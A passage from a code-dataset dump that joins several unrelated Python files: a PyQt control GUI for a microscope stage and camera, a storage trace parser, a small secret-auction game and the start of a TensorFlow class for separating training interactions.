QPushButton\n Show Cross Hairs toggle push button.\n\n Methods\n -------\n camera_window()\n Create live feed window.\n save_image()\n Live stream image capture.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize camera window.\n \n This method initializes the camera window by configuring the main\n winodw and connecting controls to control sequences.\n \"\"\"\n\n super().__init__()\n\n # Organize window.\n dock = QDockWidget(\"Live Stream\", self)\n dock.setAllowedAreas(Qt.AllDockWidgetAreas)\n dock.setFeatures(dock.DockWidgetFloatable)\n dock.setWidget(self.camera_window())\n self.addDockWidget(Qt.TopDockWidgetArea, dock)\n\n # Save image functionality.\n self.WCB.clicked.connect(self.save_image)\n\n def camera_window(self) -> QWidget:\n \"\"\"Create live feed window.\n\n Returns\n -------\n QWidget\n Window representing the live feed and interactive widgets.\n \n Notes\n -----\n This method creates the live feed by repeatedly calling for an image\n from the camera. It takes the received Numpy array and displays it on\n a matplotlib plot. 
This is a very poor way of displaying a video and\n should be looked into improving as it may significantly reduce the\n latency of the program.\n \"\"\"\n\n def updateData() -> None:\n \"\"\"Update live feed display.\n\n This method updates the live feed display by calling for a new\n image and plotting the returned Numpy array on a matplotlib plot.\n\n Notes\n -----\n The red cross hair is added by changing the central five rows and\n columns of pixels in the image to red (RGB=[225, 0, 0]).\n \"\"\"\n\n # Get new image.\n self.image = np.copy(np.rot90(get_image()))\n height = self.image.shape[0]\n width = self.image.shape[1]\n\n # Generate cross hairs\n if self.SCH.isChecked():\n length = int(0.1 * min(height, width))\n xLine = np.full((5, 2 * length, 3), [225, 0, 0])\n yLine = np.full((length * 2, 5, 3), [225, 0, 0])\n self.image[height // 2 - 2:height // 2 + 3,\n width // 2 - length:width // 2 + length] = xLine\n self.image[height // 2 - length:height // 2 +\n length:, width // 2 - 2:width // 2 + 3] = yLine\n\n # Update image.\n self.img.setImage(np.fliplr(np.rot90(self.image, 2)))\n QTimer.singleShot(75, updateData)\n\n # Initialize timer.\n now = ptime.time()\n fps2 = 1.0 / (now - self.updateTime)\n self.updateTime = now\n self.fps = self.fps * 0.9 + fps2 * 0.1\n\n # Configure camera window.\n self.cameraWindow = QWidget()\n pg.setConfigOptions(antialias=True)\n win = pg.GraphicsLayoutWidget()\n self.img = pg.ImageItem(border='w')\n\n # Create viewing box.\n view = win.addViewBox()\n view.setAspectLocked(True)\n view.addItem(self.img)\n view.setRange(QRectF(300, 0, 700, 1000))\n\n self.updateTime = ptime.time()\n self.fps = 0\n\n layout = QGridLayout()\n\n # Create, modify, and place image buttons.\n self.WCB = QPushButton(\"Image Capture\")\n self.SCH = QPushButton(\"Show Cross Hairs\")\n self.WCB.setStyleSheet(\"background-color: lightgrey\")\n self.SCH.setStyleSheet(\"background-color: lightgrey\")\n self.SCH.setCheckable(True)\n layout.addWidget(win, 0, 0, 1, 2)\n layout.addWidget(self.WCB, 1, 0, 1, 1)\n layout.addWidget(self.SCH, 1, 1, 1, 1)\n\n self.cameraWindow.setLayout(layout)\n\n updateData()\n\n return self.cameraWindow\n\n def save_image(self) -> None:\n \"\"\"Live stream image capture.\n\n This method saves a capture of the current live stream to the chosen\n directory.\n\n Notes\n -----\n The image will be saved as the Numpy array shown on the matplotlib\n plot. 
Thus, if the cross hairs button is turned on, the cross hairs\n will also be saved in the image.\n \"\"\"\n\n params = {\"parent\": self,\n \"caption\": \"Save File\",\n \"directory\": \"../figures\",\n \"filter\": \"Image files (*.jpg *.jpeg)\"}\n path, _ = QFileDialog.getSaveFileName(**params)\n\n plt.figure()\n plt.imshow(np.rot90(self.image, 3))\n plt.axis(\"off\")\n plt.savefig(path, dpi=500, bbox_inches=\"tight\")\n\n\nclass MyTableWidget(QWidget):\n \"\"\"GUI table window.\n\n The MyTableWidget class creates the table widget which extends the\n functionality of the main gui window.\n\n Parameters\n ----------\n parent : Any\n Defines parent object of the MyTableWidget object.\n\n Attributes\n ----------\n tabs : QTabWidget\n Points to the object defining the table window.\n tab2 : QWidget\n Mode tab of the table window.\n tab3 : QWidget\n Hard Limits tab of the table window.\n tab4 : QWidget\n Soft Limits tab of the table window.\n tab5 : QWidget\n Zero tab of the table window.\n tab6 : QWidget\n Backlash tab of the table window.\n RDM1 : QRadioButton\n Transmission mode radio button.\n RDM2 : QRadioButton\n Reflection mode radio button.\n RDM3 : QRadioButton\n Visible Image mode radio button.\n RDM4 : QRadioButton\n Beamsplitter mode radio button.\n group : QButtonGroup\n Mode select button group.\n TMTM : QLineEdit\n Transmission mode position line edit.\n TMRM : QLineEdit\n Reflection mode position line edit.\n TMVM : QLineEdit\n Visual image mode position line edit.\n TMBM : QLineEdit\n Beamsplitter mode position line edit.\n TMTMbutton : QPushButton\n Transmission \"Set Position\" button.\n TMRMbutton : QPushButton\n Reflection \"Set Position\" button.\n TMVMbutton : QPushButton\n Visual image \"Set Position\" button.\n TMBMbutton : QPushButton\n Beamsplitter \"Set Position\" button.\n enableDisable : QPushButton\n Enable or Disable the THORLABS/mode motor.\n home : QPushButton\n Home THORLABS/mode motor.\n xSMM, ySMM, zSMM : QLabel\n Minimum and maximum label for the sample's x, y, and z dimensions.\n xOMM, yOMM, zOMM : QLabel\n Minimum and maximum label for the objective's x, y, and z dimensions.\n xSMin, ySMin, zSMin : QLineEdit\n Soft limit minimum for the sample's x, y, and z dimensions.\n xSMax, ySMax, zSMax : QLineEdit\n Soft limit maximum for the sample's x, y, and z dimensions.\n xOMin, yOMin, zOMin : QLineEdit\n Soft limit minimum for the objective's x, y, and z dimensions.\n xOMax, yOMax, zOMax : QLineEdit\n Soft limit maximum for the objective's x, y, and z dimensions.\n SSL : QPushButton\n Set soft limits button.\n SMSL : QPushButton\n Set minimal soft limits button.\n SESL : QPushButton\n Set maximal soft limits button.\n xSOffset, ySOffset, zSOffset : QLabel\n Current offset label for the sample's x, y, and z dimensions.\n xSZero, ySZero, zSZero : QPushButton\n Button to zero the sample's x, y, and z dimensions.\n xSActual, ySActual, zSActual : QPushButton\n Button to display actual values for the sample's x, y, and z\n dimensions.\n xOOffset, yOOffset, zOOffset : QLabel\n Current offset label for the objective's x, y, and z dimensions.\n xOZero, yOZero, zOZero : QPushButton\n Button to zero the objective's x, y, and z dimensions.\n xOActual, yOActual, zOActual : QPushButton\n Button to display actual values for the objective's x, y, and z\n dimensions.\n zeroAll : QPushButton\n Button to zero all stages.\n allActual : QPushButton\n Button to change all displays to actual values.\n xSB, ySB, zSB : QLineEdit\n Backlash input for the sample's x, y, and z dimensions.\n xOB, yOB, zOB : QLineEdit\n Backlash input for the 
objective's x, y, and z dimensions.\n SBL : QPushButton\n Update all backlash values button.\n \"\"\"\n\n def __init__(self, parent: Any) -> None:\n \"\"\"Initialize table.\n \n This method creates the main user interfaces tab window by setting the\n tabs and adding then to the main tab window. Then for each tab, the\n program creates the neccessary widgets and organizes them on the tabs\n layout.\n \"\"\"\n\n self.parent = parent\n\n super(QWidget, self).__init__(parent)\n self.layout = QVBoxLayout(self)\n\n # Define tab windows.\n self.tabs = QTabWidget()\n self.tab2 = QWidget()\n self.tab3 = QWidget()\n self.tab4 = QWidget()\n self.tab5 = QWidget()\n self.tab6 = QWidget()\n\n self.tabs.resize(3000, 1000)\n\n # Add tabs to window layout.\n self.tabs.addTab(self.tab2, \"Mode\")\n self.tabs.addTab(self.tab3, \"Hard Limits\")\n self.tabs.addTab(self.tab4, \"Soft Limits\")\n self.tabs.addTab(self.tab5, \"Zero\")\n self.tabs.addTab(self.tab6, \"Backlash\")\n\n # Define helpr function to get macro values as strings.\n def macro_str(label: str) -> str:\n return str(float(self.parent.macros[label]))\n\n # ---------------------------------------------------------------------\n # Tab 2\n # ---------------------------------------------------------------------\n\n # Define tab layout.\n self.tab2.layout = QGridLayout()\n\n self.tab2.layout.addWidget(QLabel(\"Mode Selection\"), 0, 0, 1, 4)\n\n # Define mode select buttons.\n self.RDM1 = QRadioButton(\"Transmission\")\n self.RDM2 = QRadioButton(\"Reflection\")\n self.RDM3 = QRadioButton(\"Visible Image\")\n self.RDM4 = QRadioButton(\"Beamsplitter\")\n\n # Group buttons together.\n self.group = QButtonGroup()\n self.group.addButton(self.RDM1)\n self.group.addButton(self.RDM2)\n self.group.addButton(self.RDM3)\n self.group.addButton(self.RDM4)\n\n # Organize widgets on tab layout.\n self.tab2.layout.addWidget(self.RDM1, 1, 0, 1, 1)\n self.tab2.layout.addWidget(self.RDM2, 2, 0, 1, 1)\n self.tab2.layout.addWidget(self.RDM3, 3, 0, 1, 1)\n self.tab2.layout.addWidget(self.RDM4, 4, 0, 1, 1)\n\n # Set position customization widgets\n self.TMTM = QLineEdit(macro_str(\"TRANSMISSION_POSITION\"))\n self.TMRM = QLineEdit(macro_str(\"REFLECTION_POSITION\"))\n self.TMVM = QLineEdit(macro_str(\"VISIBLE_IMAGE_POSITION\"))\n self.TMBM = QLineEdit(macro_str(\"BEAMSPLITTER_POSITION\"))\n\n # Add position widgets to the tab layout.\n self.tab2.layout.addWidget(self.TMTM, 1, 1, 1, 1)\n self.tab2.layout.addWidget(self.TMRM, 2, 1, 1, 1)\n self.tab2.layout.addWidget(self.TMVM, 3, 1, 1, 1)\n self.tab2.layout.addWidget(self.TMBM, 4, 1, 1, 1)\n\n # Define set position buttons.\n self.TMTMbutton = QPushButton(\"Set Position\")\n self.TMRMbutton = QPushButton(\"Set Position\")\n self.TMVMbutton = QPushButton(\"Set Position\")\n self.TMBMbutton = QPushButton(\"Set Position\")\n\n # Add set position buttons to the tab layout.\n self.tab2.layout.addWidget(self.TMTMbutton, 1, 2, 1, 1)\n self.tab2.layout.addWidget(self.TMRMbutton, 2, 2, 1, 1)\n self.tab2.layout.addWidget(self.TMVMbutton, 3, 2, 1, 1)\n self.tab2.layout.addWidget(self.TMBMbutton, 4, 2, 1, 1)\n\n self.tab2.layout.addWidget(QLabel(\"Motor Control\"), 5, 0, 1, 4)\n longLabel = \"Enable or disable the THORLABS motor and move to home position.\"\n self.tab2.layout.addWidget(QLabel(longLabel), 6, 0, 1, 4)\n\n # THORLABS/mode motor controls.\n self.enableDisable = QPushButton(\"Disable\")\n self.home = QPushButton(\"Home Motor\")\n self.tab2.layout.addWidget(self.enableDisable, 7, 0, 1, 1)\n self.tab2.layout.addWidget(self.home, 
7, 1, 1, 2)\n\n # Set tab layout.\n self.tab2.setLayout(self.tab2.layout)\n\n # ---------------------------------------------------------------------\n # Tab 3\n # ---------------------------------------------------------------------\n\n # Define tab layout.\n self.tab3.layout = QGridLayout()\n\n # Define interactive sample widgets.\n xHardMin = self.parent.macros[\"XSMIN_HARD_LIMIT\"]\n xHardMax = self.parent.macros[\"XSMAX_HARD_LIMIT\"]\n yHardMin = self.parent.macros[\"YSMIN_HARD_LIMIT\"]\n yHardMax = self.parent.macros[\"YSMAX_HARD_LIMIT\"]\n zHardMin = self.parent.macros[\"ZSMIN_HARD_LIMIT\"]\n zHardMax = self.parent.macros[\"ZSMAX_HARD_LIMIT\"]\n self.xSMM = QLabel(f\"{xHardMin} to {xHardMax}\")\n self.ySMM = QLabel(f\"{yHardMin} to {yHardMax}\")\n self.zSMM = QLabel(f\"{zHardMin} to {zHardMax}\")\n\n # Organize sample widgets in the tab layout.\n self.tab3.layout.addWidget(QLabel(\"Sample\"), 0, 0, 1, 2)\n self.tab3.layout.addWidget(QLabel(\"In, Out\"), 1, 1, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Up, Down\"), 3, 1, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Vertical:\"), 4, 0, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Upstream, Downstream\"), 5, 1, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Focus:\"), 6, 0, 1, 1)\n self.tab3.layout.addWidget(self.xSMM, 2, 1, 1, 1)\n self.tab3.layout.addWidget(self.ySMM, 4, 1, 1, 1)\n self.tab3.layout.addWidget(self.zSMM, 6, 1, 1, 1)\n\n # Define interactive objective widgets.\n xHardMin = self.parent.macros[\"XOMIN_HARD_LIMIT\"]\n xHardMax = self.parent.macros[\"XOMAX_HARD_LIMIT\"]\n yHardMin = self.parent.macros[\"YOMIN_HARD_LIMIT\"]\n yHardMax = self.parent.macros[\"YOMAX_HARD_LIMIT\"]\n zHardMin = self.parent.macros[\"ZOMIN_HARD_LIMIT\"]\n zHardMax = self.parent.macros[\"ZOMAX_HARD_LIMIT\"]\n self.xOMM = QLabel(f\"{xHardMin} to {xHardMax}\")\n self.yOMM = QLabel(f\"{yHardMin} to {yHardMax}\")\n self.zOMM = QLabel(f\"{zHardMin} to {zHardMax}\")\n\n # Organize objective widgets in the tab layout.\n self.tab3.layout.addWidget(QLabel(\"Objective\"), 0, 2, 1, 2)\n self.tab3.layout.addWidget(QLabel(\"In, Out\"), 1, 3, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Horizontal:\"), 2, 2, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Up, Down\"), 3, 3, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Vertical:\"), 4, 2, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Upstream, Downstream\"), 5, 3, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Focus:\"), 6, 2, 1, 1)\n self.tab3.layout.addWidget(self.xOMM, 2, 3, 1, 1)\n self.tab3.layout.addWidget(self.yOMM, 4, 3, 1, 1)\n self.tab3.layout.addWidget(self.zOMM, 6, 3, 1, 1)\n\n # Set tab layout.\n self.tab3.setLayout(self.tab3.layout)\n\n # ---------------------------------------------------------------------\n # Tab 4\n # ---------------------------------------------------------------------\n\n # Define tab layout.\n self.tab4.layout = QGridLayout()\n\n # Define interactive sample widgets.\n self.xSMin = QLineEdit(macro_str(\"XSMIN_SOFT_LIMIT\"))\n self.ySMin = QLineEdit(macro_str(\"YSMIN_SOFT_LIMIT\"))\n self.zSMin = QLineEdit(macro_str(\"ZSMIN_SOFT_LIMIT\"))\n self.xSMax = QLineEdit(macro_str(\"XSMAX_SOFT_LIMIT\"))\n self.ySMax = QLineEdit(macro_str(\"YSMAX_SOFT_LIMIT\"))\n self.zSMax = QLineEdit(macro_str(\"ZSMAX_SOFT_LIMIT\"))\n\n # Organize sample widgets in the tab layout.\n self.tab4.layout.addWidget(QLabel(\"Sample\"), 0, 0, 1, 3)\n self.tab4.layout.addWidget(QLabel(\"Min\"), 1, 1, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Max\"), 1, 2, 1, 
1)\n self.tab4.layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n self.tab4.layout.addWidget(self.xSMin, 2, 1, 1, 1)\n self.tab4.layout.addWidget(self.ySMin, 3, 1, 1, 1)\n self.tab4.layout.addWidget(self.zSMin, 4, 1, 1, 1)\n self.tab4.layout.addWidget(self.xSMax, 2, 2, 1, 1)\n self.tab4.layout.addWidget(self.ySMax, 3, 2, 1, 1)\n self.tab4.layout.addWidget(self.zSMax, 4, 2, 1, 1)\n\n # Define interactive objective widgets.\n self.xOMin = QLineEdit(\n str(float(self.parent.macros[\"XOMIN_SOFT_LIMIT\"])))\n self.yOMin = QLineEdit(\n str(float(self.parent.macros[\"YOMIN_SOFT_LIMIT\"])))\n self.zOMin = QLineEdit(\n str(float(self.parent.macros[\"ZOMIN_SOFT_LIMIT\"])))\n self.xOMax = QLineEdit(\n str(float(self.parent.macros[\"XOMAX_SOFT_LIMIT\"])))\n self.yOMax = QLineEdit(\n str(float(self.parent.macros[\"YOMAX_SOFT_LIMIT\"])))\n self.zOMax = QLineEdit(\n str(float(self.parent.macros[\"ZOMAX_SOFT_LIMIT\"])))\n\n # Organize objective widgets in the tab layout.\n self.tab4.layout.addWidget(QLabel(\"Objective\"), 0, 3, 1, 3)\n self.tab4.layout.addWidget(QLabel(\"Min\"), 1, 4, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Max\"), 1, 5, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Horizontal:\"), 2, 3, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Vertical:\"), 3, 3, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Focus:\"), 4, 3, 1, 1)\n self.tab4.layout.addWidget(self.xOMin, 2, 4, 1, 1)\n self.tab4.layout.addWidget(self.yOMin, 3, 4, 1, 1)\n self.tab4.layout.addWidget(self.zOMin, 4, 4, 1, 1)\n self.tab4.layout.addWidget(self.xOMax, 2, 5, 1, 1)\n self.tab4.layout.addWidget(self.yOMax, 3, 5, 1, 1)\n self.tab4.layout.addWidget(self.zOMax, 4, 5, 1, 1)\n\n # Define, style, and organize additional interactive widgets.\n self.SSL = QPushButton(\"Set Soft Limits\")\n self.SMSL = QPushButton(\"Set Minimal Soft Limits\")\n self.SESL = QPushButton(\"Set Maximal Soft Limits\")\n self.SSL.setStyleSheet(\"background-color: lightgrey\")\n self.SMSL.setStyleSheet(\"background-color: lightgrey\")\n self.SESL.setStyleSheet(\"background-color: lightgrey\")\n self.tab4.layout.addWidget(self.SSL, 5, 0, 1, 6)\n self.tab4.layout.addWidget(self.SMSL, 6, 0, 1, 3)\n self.tab4.layout.addWidget(self.SESL, 6, 3, 1, 3)\n\n # Add information labels.\n longLabel = \"The motors will move 'backlash' steps past the low limit before moving back to the lower limit.\"\n softLimLabel = QLabel(longLabel)\n softLimLabel.setWordWrap(True)\n self.tab4.layout.addWidget(softLimLabel, 7, 0, 1, 6)\n\n # Set tab layout.\n self.tab4.setLayout(self.tab4.layout)\n\n # ---------------------------------------------------------------------\n # Tab 5\n # ---------------------------------------------------------------------\n\n # Define tab layout.\n self.tab5.layout = QGridLayout()\n\n # Define interactive sample widgets.\n self.xSOffset = QLabel(\"Offset\")\n self.ySOffset = QLabel(\"Offset\")\n self.zSOffset = QLabel(\"Offset\")\n self.xSZero = QPushButton(\"ZERO\")\n self.ySZero = QPushButton(\"ZERO\")\n self.zSZero = QPushButton(\"ZERO\")\n self.xSActual = QPushButton(\"Actual\")\n self.ySActual = QPushButton(\"Actual\")\n self.zSActual = QPushButton(\"Actual\")\n\n # Style interactive sample widgets.\n self.xSZero.setStyleSheet(\"background-color: lightgrey\")\n self.ySZero.setStyleSheet(\"background-color: lightgrey\")\n self.zSZero.setStyleSheet(\"background-color: lightgrey\")\n 
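        # Note on the Zero tab widgets above: zeroing records the current
        # reading as an offset (shown in the Offset column) so positions read
        # relative to it, while the Actual buttons switch the display back to
        # absolute values -- hence the "Cannot zero when displaying actual
        # values." notice below.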
self.xSActual.setStyleSheet(\"background-color: lightgrey\")\n self.ySActual.setStyleSheet(\"background-color: lightgrey\")\n self.zSActual.setStyleSheet(\"background-color: lightgrey\")\n\n # Organize sample widgets in the tab layout.\n self.tab5.layout.addWidget(QLabel(\"Sample\"), 0, 0, 1, 3)\n self.tab5.layout.addWidget(QLabel(\"Offset\"), 1, 1, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n self.tab5.layout.addWidget(self.xSOffset, 2, 1, 1, 1)\n self.tab5.layout.addWidget(self.ySOffset, 3, 1, 1, 1)\n self.tab5.layout.addWidget(self.zSOffset, 4, 1, 1, 1)\n self.tab5.layout.addWidget(self.xSZero, 2, 2, 1, 1)\n self.tab5.layout.addWidget(self.ySZero, 3, 2, 1, 1)\n self.tab5.layout.addWidget(self.zSZero, 4, 2, 1, 1)\n self.tab5.layout.addWidget(self.xSActual, 2, 3, 1, 1)\n self.tab5.layout.addWidget(self.ySActual, 3, 3, 1, 1)\n self.tab5.layout.addWidget(self.zSActual, 4, 3, 1, 1)\n\n # Define interactive objective widgets.\n self.xOOffset = QLabel(\"Offset\")\n self.yOOffset = QLabel(\"Offset\")\n self.zOOffset = QLabel(\"Offset\")\n self.xOZero = QPushButton(\"ZERO\")\n self.yOZero = QPushButton(\"ZERO\")\n self.zOZero = QPushButton(\"ZERO\")\n self.xOActual = QPushButton(\"Actual\")\n self.yOActual = QPushButton(\"Actual\")\n self.zOActual = QPushButton(\"Actual\")\n\n # Style interactive sample widgets.\n self.xOZero.setStyleSheet(\"background-color: lightgrey\")\n self.yOZero.setStyleSheet(\"background-color: lightgrey\")\n self.zOZero.setStyleSheet(\"background-color: lightgrey\")\n self.xOActual.setStyleSheet(\"background-color: lightgrey\")\n self.yOActual.setStyleSheet(\"background-color: lightgrey\")\n self.zOActual.setStyleSheet(\"background-color: lightgrey\")\n\n # Organize sample widgets in the tab layout.\n self.tab5.layout.addWidget(QLabel(\"Objective\"), 0, 4, 1, 3)\n self.tab5.layout.addWidget(QLabel(\"Offset\"), 1, 5, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Horizontal:\"), 2, 4, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Vertical:\"), 3, 4, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Focus:\"), 4, 4, 1, 1)\n self.tab5.layout.addWidget(self.xOOffset, 2, 5, 1, 1)\n self.tab5.layout.addWidget(self.yOOffset, 3, 5, 1, 1)\n self.tab5.layout.addWidget(self.zOOffset, 4, 5, 1, 1)\n self.tab5.layout.addWidget(self.xOZero, 2, 6, 1, 1)\n self.tab5.layout.addWidget(self.yOZero, 3, 6, 1, 1)\n self.tab5.layout.addWidget(self.zOZero, 4, 6, 1, 1)\n self.tab5.layout.addWidget(self.xOActual, 2, 7, 1, 1)\n self.tab5.layout.addWidget(self.yOActual, 3, 7, 1, 1)\n self.tab5.layout.addWidget(self.zOActual, 4, 7, 1, 1)\n\n self.zeroAll = QPushButton(\"Zero All Stages\")\n self.zeroAll.setStyleSheet(\"background-color: lightgrey\")\n self.tab5.layout.addWidget(self.zeroAll, 5, 0, 1, 4)\n\n self.allActual = QPushButton(\"Display All Actual Values\")\n self.allActual.setStyleSheet(\"background-color: lightgrey\")\n self.tab5.layout.addWidget(self.allActual, 5, 4, 1, 4)\n\n # Add information labels.\n zeroLabel = QLabel(\"Cannot zero when displaying actual values.\")\n zeroLabel.setWordWrap(True)\n self.tab5.layout.addWidget(zeroLabel, 7, 0, 1, 4)\n\n # Set tab layout.\n self.tab5.setLayout(self.tab5.layout)\n\n # ---------------------------------------------------------------------\n # Tab 6\n # ---------------------------------------------------------------------\n\n self.tab6.layout = QGridLayout()\n\n # Define interactive sample widgets.\n 
self.xSB = QLineEdit(macro_str(\"XS_BACKLASH\"))\n self.ySB = QLineEdit(macro_str(\"YS_BACKLASH\"))\n self.zSB = QLineEdit(macro_str(\"ZS_BACKLASH\"))\n\n # Organize sample widgets in the tab layout.\n self.tab6.layout.addWidget(QLabel(\"Sample\"), 0, 0, 1, 3)\n self.tab6.layout.addWidget(QLabel(\"Backlash\"), 1, 1, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n self.tab6.layout.addWidget(self.xSB, 2, 1, 1, 1)\n self.tab6.layout.addWidget(self.ySB, 3, 1, 1, 1)\n self.tab6.layout.addWidget(self.zSB, 4, 1, 1, 1)\n\n # Define interactive objective widgets.\n self.xOB = QLineEdit(macro_str(\"XO_BACKLASH\"))\n self.yOB = QLineEdit(macro_str(\"YO_BACKLASH\"))\n self.zOB = QLineEdit(macro_str(\"ZO_BACKLASH\"))\n\n # Organize objective widgets in the tab layout.\n self.tab6.layout.addWidget(QLabel(\"Objective\"), 0, 2, 1, 3)\n self.tab6.layout.addWidget(QLabel(\"Backlash\"), 1, 3, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Horizontal:\"), 2, 2, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Vertical:\"), 3, 2, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Focus:\"), 4, 2, 1, 1)\n self.tab6.layout.addWidget(self.xOB, 2, 3, 1, 1)\n self.tab6.layout.addWidget(self.yOB, 3, 3, 1, 1)\n self.tab6.layout.addWidget(self.zOB, 4, 3, 1, 1)\n\n # Define, style, and organize additional interactive widgets.\n self.SBL = QPushButton(\"Update Backlash Values\")\n self.SBL.setStyleSheet(\"background-color: lightgrey\")\n self.tab6.layout.addWidget(self.SBL, 5, 0, 1, 4)\n\n # Add information labels.\n longLabel = \"Backlash is applied when moving negitively. The motor will move 'backlash' steps past the target position before returning to the target position\"\n backlashLabel = QLabel(longLabel)\n backlashLabel.setWordWrap(True)\n self.tab6.layout.addWidget(backlashLabel, 6, 0, 1, 4)\n\n self.tab6.setLayout(self.tab6.layout)\n\n # Set window layout.\n self.layout.addWidget(self.tabs)\n self.setLayout(self.layout)\n","repo_name":"JaiWillems/MicroGUI","sub_path":"microgui/source/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":54800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35060581659","text":"from conf import parser_conf as conf\nfrom time import sleep, time\nfrom tqdm import tqdm\n\nfrom forwarder import Request\n\n\nclass Parser:\n def __init__(self, file_path=conf.traceFilePath):\n with tqdm(total=4, desc='parsing trace file') as tq:\n trace = open(file_path).read().split(\"\\n\")\n tq.update()\n trace = list(map(lambda q: q.split(conf.traceDil), trace))\n tq.update()\n trace = [e for e in trace if len(e) == conf.indicesCnt]\n tq.update()\n\n self.requests = list(map(\n lambda q: [(float(q[conf.timeInd])-float(trace[0][conf.timeInd]))*conf.delayFactor,\n q[conf.RWInd], int(q[conf.addrInd]), int(q[conf.sizeInd])],\n trace))\n tq.update()\n self.cnt = len(self.requests)\n tq.close()\n self.currentRequest = 0\n\n def start_sending_requests(self, dest):\n start = time()\n for req in self.requests:\n while time() - start < req[0]:\n sleep(2/1000000)\n if req[1] == 'W':\n dest(Request(conf.storageDevice, req[1], req[2] % conf.storageCapacity, data=b'\\x12' * req[3]))\n else:\n dest(Request(conf.storageDevice, req[1], req[2] % conf.storageCapacity, length=req[3]))\n self.currentRequest += 
1\n","repo_name":"abdijavad110/cache_implementation","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40695736223","text":"from replit import clear\n#HINT: You can call clear() to clear the output in the console.\nfrom art import logo\n\nbidder_list = {}\nshould_end = False\nwinner_list = []\n\ndef bidding_list(bidder_name, bidder_bid):\n bidder_list[bidder_name] = bidder_bid\n # bidder_list.append(bid_data)\n # print(bidder_list)\n\n#find the highest bidder\n\ndef highest_bidder(bidder_list):\n highest_bid = 0\n name = \"\"\n for key in bidder_list:\n # print(key)\n bid = bidder_list[key]\n if bid > highest_bid:\n highest_bid = bid\n name = key\n # print(highest_bid)\n winner_list.append(name)\n winner_list.append(highest_bid)\n \nprint(logo)\nprint(\"Welcome to the secret auction program.\")\n\nwhile not should_end:\n name = input(\"What is your name?: \")\n bid = int(input(\"what's your bid?: $\"))\n \n bidding_list(bidder_name=name, bidder_bid=bid)\n \n loop = input(\"Are there any other bidders? Type 'yes' or 'no': \")\n clear()\n if loop == \"no\":\n should_end = True\n highest_bidder(bidder_list)\n # print(winner_list)\n print(f\"The winner is {winner_list[0]} with a bid of ${winner_list[1]}.\")\n\n \n","repo_name":"sreuben04/secret-auction-bidding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7015090799","text":"import numpy as np\nimport tensorflow as tf\nfrom CisPValCalculationModel import CisPValCalculator\nfrom TransPValCalculationModel import TransPValCalculator\n\n\nclass TrainingInteractionsSeparator:\n\n def __init__(self, objs_holder, itype, pval_limit, silent_mode):\n \n self.itype = itype\n \n self.ints = objs_holder.tf_ints[itype]\n self.on_mask = objs_holder.tf_ints_on_mask[itype]\n\n # ranges also need to be modified\n self.sig_end = objs_holder.ints_sig_end[itype]\n self.training_end = objs_holder.ints_training_end[itype]\n\n self.silent_mode = silent_mode\n self.limit = np.log(pval_limit)\n self.sess = objs_holder.sess\n\n if itype.startswith('c'):\n self.pval_calculator = CisPValCalculator(objs_holder, itype)\n else:\n self.pval_calculator = TransPValCalculator(objs_holder, itype)\n\n # ASSIGNMENTS\n\n self.ints_assign = None\n self.on_mask_assign = None\n\n # ranges also need to be modified\n self.sig_end_assign = None\n self.training_end_assign = None\n\n self.on_sig_percentage = None\n self.off_sig_percentage = None\n \n self.define_separation_model()\n\n def define_separation_model(self):\n\n log_pvals = self.pval_calculator.run_model(self.ints)\n\n # significant masks\n sig_masks = tf.less_equal(log_pvals, self.limit)\n\n # now finding new ranges! 
